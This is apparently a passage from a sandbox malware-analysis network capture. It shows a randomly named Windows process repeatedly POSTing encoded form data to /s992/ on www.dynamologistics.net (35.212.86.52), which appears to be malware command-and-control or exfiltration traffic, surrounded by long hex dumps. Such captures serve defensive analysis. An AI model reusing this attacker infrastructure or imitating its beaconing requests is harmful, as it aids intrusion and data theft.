                                    Jul 11, 2024 15:06:46.787475109 CEST | 1236 | IN | Data Raw: 49 2e ec 54 0a 74 09 38 a4 a9 f6 68 7b ba 1e bf db cf 50 a8 a6 b6 1e 4d 4e dd e3 a4 bb 6d 07 bf 21 17 68 23 63 11 43 a0 a8 26 14 63 55 41 0e 66 5a e8 27 ca 61 f3 82 1c fc b8 93 45 80 6e b0 eb 6b 84 83 0f e0 22 54 1c fa 59 d4 e1 7e 3b f4 68 ae 7a
                                    Data Ascii: I.Tt8h{PMNm!h#cC&cUAfZ'aEnk"TY~;hzk;kn*VFHlcG\~^~8dQAceE!Vdg,<@>b<6_%~]8U@;8AhoYufn<TP:+r51.5
                                    Jul 11, 2024 15:06:46.787486076 CEST | 1236 | IN | Data Raw: 2b ec b9 28 91 36 fc f5 2d 3e 31 9f e4 3f 2d 13 98 50 52 8a d3 85 65 13 09 0d 2e b6 6d ea a0 7f a1 14 ec 3c d0 82 a2 23 a9 86 c9 99 a0 ea 50 50 38 95 f6 cc 70 1c 1d 87 0d db 07 cc 12 4c c7 f2 93 f4 1d 8a a2 ea d1 be a2 01 30 d9 98 d5 5a c9 66 87
                                    Data Ascii: +(6->1?-PRe.m<#PP8pL0Zf<VJa_q(L3&-R"v,X=]Y<`!2B.Y0;9pv2RPsP$\0y~Ao[}UG\U&~ul&@NLhxQiv[9}6 @<
                                    Jul 11, 2024 15:06:46.787494898 CEST | 1236 | IN | Data Raw: 4f 16 96 16 ad 2c ab 9a 81 25 12 67 4d 30 b6 2f d3 84 67 45 81 2b 97 5d 8b 6a 96 28 6c ed d3 1a 29 a9 42 b8 54 81 b9 60 74 8d 4b 3c 53 16 0a 27 59 88 4e 15 2f 5c ba 10 5d 8a 67 0a 43 e1 24 0c d1 a9 ea 85 4b 19 a2 4b f1 4c 69 30 9c a4 41 36 55 bf
                                    Data Ascii: O,%gM0/gE+]j(l)BT`tK<S'YN/\]gC$KKLi0A6UPj\)'D=Hym2Aa<z,du<D.y.3pT%x<N W$2F)%`<gT.1/<6%[Rmx!.Uq!IR++
                                    Jul 11, 2024 15:06:46.787504911 CEST | 1236 | IN | Data Raw: a8 70 9d ca 0c c3 7e 49 7c 58 fd a5 3b 14 b8 2a 26 4d fb aa 18 55 2b 8c 92 f6 a5 b8 04 cb 53 34 23 49 d1 ce 22 c9 12 94 a0 9d 26 01 33 f5 cc 50 d2 b3 f3 48 b0 ca 04 9b 70 e7 49 c0 4c 35 33 94 d4 ec 3c 92 ab 40 36 e0 ce 93 82 79 5a 66 28 69 d9 79
                                    Data Ascii: p~I|X;*&MU+S4#I"&3PHpIL53<@6yZf(iyV|;M)dVEv1#A<*y3^'s1RHs1/tP1yU24S%%IjU>(e2%hKZ&*b&Sf2IB]$J<=3L"V MS4CA:-u*3(McTn@
                                    Jul 11, 2024 15:06:46.787516117 CEST | 1236 | IN | Data Raw: 34 14 4d d2 20 99 6a 5e b0 94 41 b2 14 7e 41 18 b1 df 0d 51 b1 13 8d dd d6 16 66 b4 6c 3f 2d cc 68 61 58 bd 2b ad 63 c5 e6 3b b6 03 5a 98 c9 aa 30 20 c7 3c 56 8f 1d 27 31 ad 65 3b 2a 55 ad ed 74 1b ea 60 6d aa 5a ce 6a 45 a6 01 b7 18 d8 16 31 d8
                                    Data Ascii: 4M j^A~AQfl?-haX+c;Z0 <V'1e;*Ut`mZjE1~ndliLa0\HbS {D|W)6^bw1j.h6`edi}0M{c4@@o${AQ*HQ2kcmPJN#F
                                    Jul 11, 2024 15:06:46.787616014 CEST | 1236 | IN | Data Raw: 79 90 2b 45 f3 e4 c1 58 92 47 60 d2 d6 1d aa 33 f4 13 61 1f 4a 12 51 1e b3 94 e7 ba 8f 12 77 03 f8 4e 4f 9c 40 c6 0d 01 78 03 d7 58 fd c2 25 1f dc 43 d2 4c 1a 17 c1 ae 9e 6c 36 d5 be d8 54 fb 0a 27 f5 90 2d 85 3d 79 36 9b 2a 5f 6c aa 7c b1 49 3c
                                    Data Ascii: y+EXG`3aJQwNO@xX%CLl6T'-=y6*_l|I<dKaOd%8UI't<dslX5 ~E:#3i}t{R<S1O-:;UpiCt))8#+q+ScI)0A"c<P |9t{ |{=
                                    Jul 11, 2024 15:06:46.787626982 CEST | 1236 | IN | Data Raw: bf ed dd b3 da b6 c2 a7 ac 6a 9b 71 31 65 43 cf 5b cc 07 54 93 77 df bd 24 62 9c ab 4d c9 4b a7 9c df a5 4e 05 06 9d 62 55 27 4c c7 27 58 10 f8 c2 7a c9 38 45 33 ff 52 29 69 a4 52 f2 48 e1 ce 93 80 9e 34 97 48 4d 2d 89 24 52 12 49 e0 4e 94 80 9e
                                    Data Ascii: jq1eC[Tw$bMKNbU'L'Xz8E3R)iRH4HM-$RIN4HH%D)K{<v,$'-e.v!$Jii,$<OK>agMS6l|-$H(r[GfRN<A3MiMTb%DKT&SfJ$i2#)44aR4OEMH
                                    Jul 11, 2024 15:06:46.787636995 CEST | 1236 | IN | Data Raw: b8 4d 20 67 b2 62 66 3d f5 59 32 f8 d1 5e ae 17 f3 8a 72 b4 97 f3 c5 73 c1 74 88 ed 23 b8 c0 25 92 79 fa b3 74 0a c7 73 11 9b 4e 55 d1 52 98 a7 3a 4b bd e0 8a 9a f0 8d f4 b0 1d 26 ae 9a 82 22 b0 65 16 06 31 65 03 05 74 2d f6 c9 c4 e2 cb cf d8 c5
                                    Data Ascii: M gbf=Y2^rst#%ytsNUR:K&"e1et-p*o&-^,CHDCi3khRK=yO~q-o`A}zkE62z/>@2NI_,rXKK}p8%]x_d%[t6kcYv;p-
                                    Jul 11, 2024 15:06:46.792642117 CEST | 1236 | IN | Data Raw: b9 e1 74 62 32 94 b8 38 fb 18 b9 16 78 8e e1 14 4c 86 13 99 0c 15 71 1a 4e c5 b8 c0 f3 0c c7 15 76 f9 4b eb ef f2 97 60 da 4b 0b f0 29 9c d7 bd 31 98 cc 26 2e 99 49 30 3b 37 71 a5 70 9e d5 3c 58 74 9a b8 e4 24 72 c9 68 e2 9a c3 b9 3e 23 97 6c 46
                                    Data Ascii: tb28xLqNvK`K)1&.I0;7qp<Xt$rh>#lFh#e_"3M`d"e%#UfviMTtP%(xK<r@f"Jo1%&YG0%3tCqZ*eZyR8KtrO.-<{1\d `K\N#]pd[&S8LtpdbKL)&


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    14 | 192.168.2.6 | 49737 | 35.212.86.52 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:48.845266104 CEST | 883 | OUT | POST /s992/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dynamologistics.net
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dynamologistics.net
                                    Referer: http://www.dynamologistics.net/s992/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 57 4e 2b 5a 7a 38 69 67 6e 34 43 6f 58 67 31 75 43 79 66 67 46 53 4c 54 39 6e 6f 52 36 4d 6d 51 58 51 77 57 4a 65 61 41 73 63 33 77 55 4e 64 45 67 67 39 69 52 50 4f 6d 5a 48 75 46 4e 74 31 71 35 30 42 51 54 63 2b 4c 38 68 49 35 45 74 68 79 73 70 65 57 76 5a 79 45 6c 45 46 43 66 51 6b 7a 4b 52 62 52 6f 63 4e 50 43 30 58 38 41 39 4b 75 7a 62 69 63 59 6a 4c 7a 42 61 5a 71 67 39 41 37 4d 53 79 62 52 53 6a 69 75 59 68 38 61 6d 70 58 55 53 70 51 4a 2f 6d 42 53 6b 78 54 70 41 75 56 79 4c 36 52 6a 57 70 67 69 6f 75 36 4c 6c 73 70 49 2f 4b 46 78 55 6d 65 67 4c 30 4f 75 5a 6c 31 77 76 6f 45 64 34 56 76 4e 56 50 70 31 76 74 63 6f 41 2f 71 58 53 53 33 5a 4d 46 48 5a 34 38 6e 6c 41 3d 3d
                                    Data Ascii: bB=WN+Zz8ign4CoXg1uCyfgFSLT9noR6MmQXQwWJeaAsc3wUNdEgg9iRPOmZHuFNt1q50BQTc+L8hI5EthyspeWvZyElEFCfQkzKRbRocNPC0X8A9KuzbicYjLzBaZqg9A7MSybRSjiuYh8ampXUSpQJ/mBSkxTpAuVyL6RjWpgiou6LlspI/KFxUmegL0OuZl1wvoEd4VvNVPp1vtcoA/qXSS3ZMFHZ48nlA==
                                    Jul 11, 2024 15:06:49.328574896 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:49 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                    X-Proxy-Cache-Info: DT:1
                                    Content-Encoding: gzip
                                    Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                    Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11
                                    Jul 11, 2024 15:06:49.328617096 CEST | 1236 | IN | Data Raw: 34 e3 10 ca cd fe d3 01 79 31 2f 3d ae 1e bf 7c 98 64 e8 fa f6 f1 d3 71 ff 2b da de e3 fd d5 5f 5c c8 4c 8d 1c a2 e9 bc 7a da dc ec 8f ef 37 d7 f7 4f 9b cd d5 ed c3 d5 71 da 74 fd 75 13 ba 9c 79 b3 19 9b b3 97 ce b1 dc 1d 3e 8e 9e 79 f1 34 eb 22
                                    Data Ascii: 4y1/=|dq+_\Lz7Oqtuy>y4"zz9o|@ss{59r3`'9;_=^= M>'tduwwl'*k%a7y7rr}eu{=_zqTpC9c=C?L
                                    Jul 11, 2024 15:06:49.328628063 CEST | 1236 | IN | Data Raw: 49 2e ec 54 0a 74 09 38 a4 a9 f6 68 7b ba 1e bf db cf 50 a8 a6 b6 1e 4d 4e dd e3 a4 bb 6d 07 bf 21 17 68 23 63 11 43 a0 a8 26 14 63 55 41 0e 66 5a e8 27 ca 61 f3 82 1c fc b8 93 45 80 6e b0 eb 6b 84 83 0f e0 22 54 1c fa 59 d4 e1 7e 3b f4 68 ae 7a
                                    Data Ascii: I.Tt8h{PMNm!h#cC&cUAfZ'aEnk"TY~;hzk;kn*VFHlcG\~^~8dQAceE!Vdg,<@>b<6_%~]8U@;8AhoYufn<TP:+r51.5
                                    Jul 11, 2024 15:06:49.328639030 CEST | 1236 | IN | Data Raw: 2b ec b9 28 91 36 fc f5 2d 3e 31 9f e4 3f 2d 13 98 50 52 8a d3 85 65 13 09 0d 2e b6 6d ea a0 7f a1 14 ec 3c d0 82 a2 23 a9 86 c9 99 a0 ea 50 50 38 95 f6 cc 70 1c 1d 87 0d db 07 cc 12 4c c7 f2 93 f4 1d 8a a2 ea d1 be a2 01 30 d9 98 d5 5a c9 66 87
                                    Data Ascii: +(6->1?-PRe.m<#PP8pL0Zf<VJa_q(L3&-R"v,X=]Y<`!2B.Y0;9pv2RPsP$\0y~Ao[}UG\U&~ul&@NLhxQiv[9}6 @<
                                    Jul 11, 2024 15:06:49.328649044 CEST | 1236 | IN | Data Raw: 4f 16 96 16 ad 2c ab 9a 81 25 12 67 4d 30 b6 2f d3 84 67 45 81 2b 97 5d 8b 6a 96 28 6c ed d3 1a 29 a9 42 b8 54 81 b9 60 74 8d 4b 3c 53 16 0a 27 59 88 4e 15 2f 5c ba 10 5d 8a 67 0a 43 e1 24 0c d1 a9 ea 85 4b 19 a2 4b f1 4c 69 30 9c a4 41 36 55 bf
                                    Data Ascii: O,%gM0/gE+]j(l)BT`tK<S'YN/\]gC$KKLi0A6UPj\)'D=Hym2Aa<z,du<D.y.3pT%x<N W$2F)%`<gT.1/<6%[Rmx!.Uq!IR++
                                    Jul 11, 2024 15:06:49.328659058 CEST | 1236 | IN | Data Raw: a8 70 9d ca 0c c3 7e 49 7c 58 fd a5 3b 14 b8 2a 26 4d fb aa 18 55 2b 8c 92 f6 a5 b8 04 cb 53 34 23 49 d1 ce 22 c9 12 94 a0 9d 26 01 33 f5 cc 50 d2 b3 f3 48 b0 ca 04 9b 70 e7 49 c0 4c 35 33 94 d4 ec 3c 92 ab 40 36 e0 ce 93 82 79 5a 66 28 69 d9 79
                                    Data Ascii: p~I|X;*&MU+S4#I"&3PHpIL53<@6yZf(iyV|;M)dVEv1#A<*y3^'s1RHs1/tP1yU24S%%IjU>(e2%hKZ&*b&Sf2IB]$J<=3L"V MS4CA:-u*3(McTn@
                                    Jul 11, 2024 15:06:49.328670025 CEST | 1236 | IN | Data Raw: 34 14 4d d2 20 99 6a 5e b0 94 41 b2 14 7e 41 18 b1 df 0d 51 b1 13 8d dd d6 16 66 b4 6c 3f 2d cc 68 61 58 bd 2b ad 63 c5 e6 3b b6 03 5a 98 c9 aa 30 20 c7 3c 56 8f 1d 27 31 ad 65 3b 2a 55 ad ed 74 1b ea 60 6d aa 5a ce 6a 45 a6 01 b7 18 d8 16 31 d8
                                    Data Ascii: 4M j^A~AQfl?-haX+c;Z0 <V'1e;*Ut`mZjE1~ndliLa0\HbS {D|W)6^bw1j.h6`edi}0M{c4@@o${AQ*HQ2kcmPJN#F
                                    Jul 11, 2024 15:06:49.328886986 CEST | 1236 | IN | Data Raw: 79 90 2b 45 f3 e4 c1 58 92 47 60 d2 d6 1d aa 33 f4 13 61 1f 4a 12 51 1e b3 94 e7 ba 8f 12 77 03 f8 4e 4f 9c 40 c6 0d 01 78 03 d7 58 fd c2 25 1f dc 43 d2 4c 1a 17 c1 ae 9e 6c 36 d5 be d8 54 fb 0a 27 f5 90 2d 85 3d 79 36 9b 2a 5f 6c aa 7c b1 49 3c
                                    Data Ascii: y+EXG`3aJQwNO@xX%CLl6T'-=y6*_l|I<dKaOd%8UI't<dslX5 ~E:#3i}t{R<S1O-:;UpiCt))8#+q+ScI)0A"c<P |9t{ |{=
                                    Jul 11, 2024 15:06:49.328896999 CEST | 1236 | IN | Data Raw: bf ed dd b3 da b6 c2 a7 ac 6a 9b 71 31 65 43 cf 5b cc 07 54 93 77 df bd 24 62 9c ab 4d c9 4b a7 9c df a5 4e 05 06 9d 62 55 27 4c c7 27 58 10 f8 c2 7a c9 38 45 33 ff 52 29 69 a4 52 f2 48 e1 ce 93 80 9e 34 97 48 4d 2d 89 24 52 12 49 e0 4e 94 80 9e
                                    Data Ascii: jq1eC[Tw$bMKNbU'L'Xz8E3R)iRH4HM-$RIN4HH%D)K{<v,$'-e.v!$Jii,$<OK>agMS6l|-$H(r[GfRN<A3MiMTb%DKT&SfJ$i2#)44aR4OEMH
                                    Jul 11, 2024 15:06:49.328907013 CEST | 1236 | IN | Data Raw: b8 4d 20 67 b2 62 66 3d f5 59 32 f8 d1 5e ae 17 f3 8a 72 b4 97 f3 c5 73 c1 74 88 ed 23 b8 c0 25 92 79 fa b3 74 0a c7 73 11 9b 4e 55 d1 52 98 a7 3a 4b bd e0 8a 9a f0 8d f4 b0 1d 26 ae 9a 82 22 b0 65 16 06 31 65 03 05 74 2d f6 c9 c4 e2 cb cf d8 c5
                                    Data Ascii: M gbf=Y2^rst#%ytsNUR:K&"e1et-p*o&-^,CHDCi3khRK=yO~q-o`A}zkE62z/>@2NI_,rXKK}p8%]x_d%[t6kcYv;p-
                                    Jul 11, 2024 15:06:49.333775997 CEST | 1236 | IN | Data Raw: b9 e1 74 62 32 94 b8 38 fb 18 b9 16 78 8e e1 14 4c 86 13 99 0c 15 71 1a 4e c5 b8 c0 f3 0c c7 15 76 f9 4b eb ef f2 97 60 da 4b 0b f0 29 9c d7 bd 31 98 cc 26 2e 99 49 30 3b 37 71 a5 70 9e d5 3c 58 74 9a b8 e4 24 72 c9 68 e2 9a c3 b9 3e 23 97 6c 46
                                    Data Ascii: tb28xLqNvK`K)1&.I0;7qp<Xt$rh>#lFh#e_"3M`d"e%#UfviMTtP%(xK<r@f"Jo1%&YG0%3tCqZ*eZyR8KtrO.-<{1\d `K\N#]pd[&S8LtpdbKL)&


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    15 | 192.168.2.6 | 49738 | 35.212.86.52 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:51.421675920 CEST | 1896 | OUT | POST /s992/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dynamologistics.net
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dynamologistics.net
                                    Referer: http://www.dynamologistics.net/s992/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 57 4e 2b 5a 7a 38 69 67 6e 34 43 6f 58 67 31 75 43 79 66 67 46 53 4c 54 39 6e 6f 52 36 4d 6d 51 58 51 77 57 4a 65 61 41 73 63 50 77 55 59 42 45 76 6e 68 69 51 50 4f 6d 52 6e 75 47 4e 74 30 6f 35 30 5a 63 54 63 36 31 38 6e 4d 35 45 50 35 79 70 59 65 57 68 70 79 45 70 6b 46 42 53 77 6b 63 4b 53 6a 64 6f 64 78 50 43 30 58 38 41 37 6d 75 6e 59 36 63 65 6a 4c 77 45 71 5a 32 6b 39 41 54 4d 53 71 68 52 53 6e 63 75 6f 42 38 64 47 35 58 58 67 42 51 47 2f 6d 48 63 45 78 62 70 41 71 77 79 4c 32 33 6a 56 31 61 69 71 79 36 62 54 52 32 56 75 72 59 6a 58 69 4f 67 38 5a 6b 69 4f 6b 44 30 76 35 39 4d 5a 70 48 48 78 4c 6d 79 4a 6f 43 69 54 4b 77 56 51 6d 75 65 61 38 47 63 4a 42 76 31 77 31 46 78 63 6e 74 76 4f 46 4b 33 74 4a 33 43 67 53 6f 4d 59 35 57 51 4a 36 56 6a 78 45 59 2b 5a 6c 79 6c 55 4f 6b 49 53 6f 4b 37 5a 71 78 53 78 43 36 33 49 4c 49 6f 45 6b 32 47 31 7a 6e 63 51 6e 55 52 45 2f 72 32 69 56 53 2b 43 4f 37 6e 4a 42 74 78 53 4b 77 6f 37 52 66 56 62 46 76 68 7a 52 65 46 72 77 54 37 65 71 34 4c 75 68 [TRUNCATED]
                                    Data Ascii: bB=WN+Zz8ign4CoXg1uCyfgFSLT9noR6MmQXQwWJeaAscPwUYBEvnhiQPOmRnuGNt0o50ZcTc618nM5EP5ypYeWhpyEpkFBSwkcKSjdodxPC0X8A7munY6cejLwEqZ2k9ATMSqhRSncuoB8dG5XXgBQG/mHcExbpAqwyL23jV1aiqy6bTR2VurYjXiOg8ZkiOkD0v59MZpHHxLmyJoCiTKwVQmuea8GcJBv1w1FxcntvOFK3tJ3CgSoMY5WQJ6VjxEY+ZlylUOkISoK7ZqxSxC63ILIoEk2G1zncQnURE/r2iVS+CO7nJBtxSKwo7RfVbFvhzReFrwT7eq4Luh [TRUNCATED]
                                    Jul 11, 2024 15:06:52.573354006 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:51 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                    X-Proxy-Cache-Info: DT:1
                                    Content-Encoding: gzip
                                    Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                    Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11
                                    Jul 11, 2024 15:06:52.573369026 CEST | 1236 | IN | Data Raw: 34 e3 10 ca cd fe d3 01 79 31 2f 3d ae 1e bf 7c 98 64 e8 fa f6 f1 d3 71 ff 2b da de e3 fd d5 5f 5c c8 4c 8d 1c a2 e9 bc 7a da dc ec 8f ef 37 d7 f7 4f 9b cd d5 ed c3 d5 71 da 74 fd 75 13 ba 9c 79 b3 19 9b b3 97 ce b1 dc 1d 3e 8e 9e 79 f1 34 eb 22
                                    Data Ascii: 4y1/=|dq+_\Lz7Oqtuy>y4"zz9o|@ss{59r3`'9;_=^= M>'tduwwl'*k%a7y7rr}eu{=_zqTpC9c=C?L
                                    Jul 11, 2024 15:06:52.573378086 CEST | 1236 | IN | Data Raw: 49 2e ec 54 0a 74 09 38 a4 a9 f6 68 7b ba 1e bf db cf 50 a8 a6 b6 1e 4d 4e dd e3 a4 bb 6d 07 bf 21 17 68 23 63 11 43 a0 a8 26 14 63 55 41 0e 66 5a e8 27 ca 61 f3 82 1c fc b8 93 45 80 6e b0 eb 6b 84 83 0f e0 22 54 1c fa 59 d4 e1 7e 3b f4 68 ae 7a
                                    Data Ascii: I.Tt8h{PMNm!h#cC&cUAfZ'aEnk"TY~;hzk;kn*VFHlcG\~^~8dQAceE!Vdg,<@>b<6_%~]8U@;8AhoYufn<TP:+r51.5
                                    Jul 11, 2024 15:06:52.573385954 CEST | 1236 | IN | Data Raw: 2b ec b9 28 91 36 fc f5 2d 3e 31 9f e4 3f 2d 13 98 50 52 8a d3 85 65 13 09 0d 2e b6 6d ea a0 7f a1 14 ec 3c d0 82 a2 23 a9 86 c9 99 a0 ea 50 50 38 95 f6 cc 70 1c 1d 87 0d db 07 cc 12 4c c7 f2 93 f4 1d 8a a2 ea d1 be a2 01 30 d9 98 d5 5a c9 66 87
                                    Data Ascii: +(6->1?-PRe.m<#PP8pL0Zf<VJa_q(L3&-R"v,X=]Y<`!2B.Y0;9pv2RPsP$\0y~Ao[}UG\U&~ul&@NLhxQiv[9}6 @<
                                    Jul 11, 2024 15:06:52.573390961 CEST | 1236 | IN | Data Raw: 4f 16 96 16 ad 2c ab 9a 81 25 12 67 4d 30 b6 2f d3 84 67 45 81 2b 97 5d 8b 6a 96 28 6c ed d3 1a 29 a9 42 b8 54 81 b9 60 74 8d 4b 3c 53 16 0a 27 59 88 4e 15 2f 5c ba 10 5d 8a 67 0a 43 e1 24 0c d1 a9 ea 85 4b 19 a2 4b f1 4c 69 30 9c a4 41 36 55 bf
                                    Data Ascii: O,%gM0/gE+]j(l)BT`tK<S'YN/\]gC$KKLi0A6UPj\)'D=Hym2Aa<z,du<D.y.3pT%x<N W$2F)%`<gT.1/<6%[Rmx!.Uq!IR++
                                    Jul 11, 2024 15:06:52.573399067 CEST | 1236 | IN | Data Raw: a8 70 9d ca 0c c3 7e 49 7c 58 fd a5 3b 14 b8 2a 26 4d fb aa 18 55 2b 8c 92 f6 a5 b8 04 cb 53 34 23 49 d1 ce 22 c9 12 94 a0 9d 26 01 33 f5 cc 50 d2 b3 f3 48 b0 ca 04 9b 70 e7 49 c0 4c 35 33 94 d4 ec 3c 92 ab 40 36 e0 ce 93 82 79 5a 66 28 69 d9 79
                                    Data Ascii: p~I|X;*&MU+S4#I"&3PHpIL53<@6yZf(iyV|;M)dVEv1#A<*y3^'s1RHs1/tP1yU24S%%IjU>(e2%hKZ&*b&Sf2IB]$J<=3L"V MS4CA:-u*3(McTn@
                                    Jul 11, 2024 15:06:52.573405027 CEST | 776 | IN | Data Raw: 34 14 4d d2 20 99 6a 5e b0 94 41 b2 14 7e 41 18 b1 df 0d 51 b1 13 8d dd d6 16 66 b4 6c 3f 2d cc 68 61 58 bd 2b ad 63 c5 e6 3b b6 03 5a 98 c9 aa 30 20 c7 3c 56 8f 1d 27 31 ad 65 3b 2a 55 ad ed 74 1b ea 60 6d aa 5a ce 6a 45 a6 01 b7 18 d8 16 31 d8
                                    Data Ascii: 4M j^A~AQfl?-haX+c;Z0 <V'1e;*Ut`mZjE1~ndliLa0\HbS {D|W)6^bw1j.h6`edi}0M{c4@@o${AQ*HQ2kcmPJN#F
                                    Jul 11, 2024 15:06:52.573412895 CEST | 1236 | IN | Data Raw: 60 2c 8a 80 44 ac 68 61 2e 02 d2 24 58 96 08 18 88 f5 4e 12 af 77 41 5e ef e4 98 43 59 4d 01 76 6b 1b 6c ef 0e aa 00 d3 4b 45 3b 76 01 42 a9 02 5c ad e1 02 33 6a 44 68 9e 0a 74 34 55 20 26 d6 b3 50 aa 40 4c 09 9a a7 02 c5 a2 0a c4 c4 7a 16 4a 15
                                    Data Ascii: `,Dha.$XNwA^CYMvklKE;vB\3jDht4U &P@LzJ)ATXTX\I,0U@jAr, n*0*}PcT@1RbJ<(U &P@LH* Me $m=K/q.%1MuC@M^AWB4
